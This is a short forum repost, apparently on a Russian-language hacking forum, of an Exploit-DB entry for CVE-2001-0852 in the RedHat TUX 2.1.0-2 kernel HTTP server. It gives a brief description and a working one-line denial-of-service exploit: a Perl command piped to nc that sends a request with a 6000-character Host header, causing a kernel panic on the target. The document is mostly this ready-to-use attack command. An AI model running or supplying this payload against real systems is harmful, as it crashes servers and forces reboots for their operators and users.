Exploit RedHat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21141
Проверка EDB
  1. Пройдено
Автор
AIDEN ORAWE
Тип уязвимости
DOS
Платформа
LINUX
CVE
cve-2001-0852
Дата публикации
2001-11-05
Код:
source: https://www.securityfocus.com/bid/3506/info

TUX is a kernel based HTTP server released under the GNU General Public License. It is able to serve static content, cache dynamic content, and coordinate with other HTTP servers to produce dynamic content.

An error exists when the TUX daemon received an oversized Host: header as part of a HTTP request. The request will result in an assertation failure and eventually in a kernel panic. At this point a system reboot will be required to regain normal functionality. 

perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 .
qq(\n)" |nc <ip address> <dest_port>
 
Источник
www.exploit-db.com

Похожие темы